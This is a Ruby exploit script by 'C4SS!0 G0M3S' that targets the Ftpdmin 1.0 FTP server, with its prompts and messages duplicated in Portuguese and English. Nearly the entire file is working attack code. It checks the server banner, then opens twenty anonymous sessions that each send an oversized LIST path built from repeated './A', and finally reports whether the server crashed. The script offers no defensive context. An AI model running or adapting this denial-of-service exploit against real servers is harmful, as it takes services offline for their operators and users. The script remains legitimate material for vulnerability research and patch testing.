#!/usr/bin/ruby # # #[+]Exploit Title: Exploit Denial of Service Ftpdmin 1.0 #[+]Date: 03\14\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.softpedia.com/get/Internet/Servers/FTP-Servers/ftpdmin.shtml #[+]Version: 1.0 #[+]Tested On: WIN-XP SP3 Porguese Brazilian #[+]CVE: N/A #[+]Language: Portuguese and English # # # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxxxx xxx xxx xxx xxx xxx xxx xxxxxx # xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx # xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx # xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx # # #Criado por C4SS!0 G0M3S #E-mail Louredo_@hotmail.com #Site www.exploit-br.org # # # require 'socket' require 'fcntl' # # #AQUI O EXPLOIT ESTA EM PORTUGUES #----------------------------------------- # def portuguese() def len(str) return str.length end sys = `ver` if sys=~/Windows/ system("cls") system("color 4f") else system("clear") end def usage() print """ ======================================================= ======================================================= ==========Exploit Denial of Service Ftpdmin 1.0======== ==========Autor C4SS!0 G0M3S=========================== ==========E-mail Louredo_@hotmail.com================== ==========Site www.exploit-br.org====================== ======================================================= ======================================================= """ end if len(ARGV)!=2 usage() print "\t\t[-]Modo de Uso: ruby #{$0} \n" print "\t\t[-]Exemplo: ruby #{$0} 21\n" exit(0) end usage() buf = "./A" * (150/3) host = ARGV[0] porta = ARGV[1].to_i print "\t\t[+]Conectando ao Servidor #{host}...\n\n" sleep(1) begin s = TCPSocket.new(host,porta) print "\t\t[+]Checando se o Servidor e Vulneravel\n\n" sleep(1) rescue print "\t\t[+]Erro ao se Conectar no Servidor\n" exit(0) end banner = s.recv(2000) s.close unless banner =~/Minftpd/ print "\t\t[+]Sinto Muito, o Servidor Nao e Vulneravel:(\n" sleep(1) exit(0) end print "\t\t[+]Servidor e Vulneravel:)\n\n" sleep(1) print "\t\t[+]Enviando Exploit...\n\n" sleep(1) i=0 while i<20 sock = TCPSocket.new(host,porta) sock.recv(2000) sock.puts "USER anonymous\r\n" sock.recv(2000) sock.puts "PASS anonymous\r\n" sock.recv(2000) sock.puts "LIST #{buf}\r\n" sock.close i+=1 end print "\t\t[+]Exploit Enviado com Sucesso\n\n" sleep(1) print "\t\t[+]Checando se o Exploit Funcionou\n\n" sleep(5) begin so = TCPSocket.new(host,porta) so.send("2000") print "\t\t[+]Sinto Muito,O Exploit Nao Funcionou:(\n\n" rescue print "\t\t[+]Parabens, O Exploit Funcionou com Sucesso:)\n\n" end end # #HERE THE EXPLOIT IS IN ENGLISH #---------------------------------- # def english() def len(str) return str.length end sys = `ver` if sys=~/Windows/ system("cls") system("color 4f") else system("clear") end def usage() print """ ======================================================= ======================================================= ==========Exploit Denial of Service Ftpdmin 1.0======== ==========Autor C4SS!0 G0M3S=========================== ==========E-mail Louredo_@hotmail.com================== ==========Site www.exploit-br.org====================== ======================================================= ======================================================= """ end if len(ARGV)!=2 usage() print "\t\t[-]Usage: ruby #{$0} \n" print "\t\t[-]Exemple: ruby #{$0} 21\n" exit(0) end usage() buf = "./A" * (150/3) host = ARGV[0] porta = ARGV[1].to_i print "\t\t[+]Connecting to Server #{host}...\n\n" sleep(1) begin s = TCPSocket.new(host,porta) print "\t\t[+]Checking if server is vulnerable\n\n" sleep(1) rescue print "\t\t[+]Error to Connect to Server\n" exit(0) end banner = s.recv(2000) s.close unless banner =~/Minftpd/ print "\t\t[+]I'm Sorry, the Server is not Vulnerable:(\n" sleep(1) exit(0) end print "\t\t[+]Server is Vulnerable:)\n\n" sleep(1) print "\t\t[+]Sending Exploit...\n\n" sleep(1) i=0 while i<20 sock = TCPSocket.new(host,porta) sock.recv(2000) sock.puts "USER anonymous\r\n" sock.recv(2000) sock.puts "PASS anonymous\r\n" sock.recv(2000) sock.puts "LIST #{buf}\r\n" sock.close i+=1 end print "\t\t[+]Submitted Exploit Success\n\n" sleep(1) print "\t\t[+]Checking if the Exploit Works\n\n" sleep(5) begin so = TCPSocket.new(host,porta) so.send("2000") print "\t\t[+]I'm Sorry, The Exploit Not Worked:(\n\n" rescue print "\t\t[+]Congratulations, The exploit worked with Success:)\n\n" end end def start() sis = `ver` if sis=~/Windows/ system("cls") system("color 4f") else system("clear") end begin f = File.open("lang.txt","r") file = f.gets.chomp if file == "1" portuguese() end if file == "2" english() end rescue print """ [+]Select Your Language: [+]Selecine Seu Idioma: 1 - Portugues 2 - English """ print "\nWhat Your Language?\n=>" lang = STDIN.gets.chomp print lang if lang == "1" f = File.open("lang.txt","w") f.write(1) f.close portuguese() end if lang == "2" f = File.open("lang.txt","w") f.write("2") f.close english() end end end if 10 == 10 start() end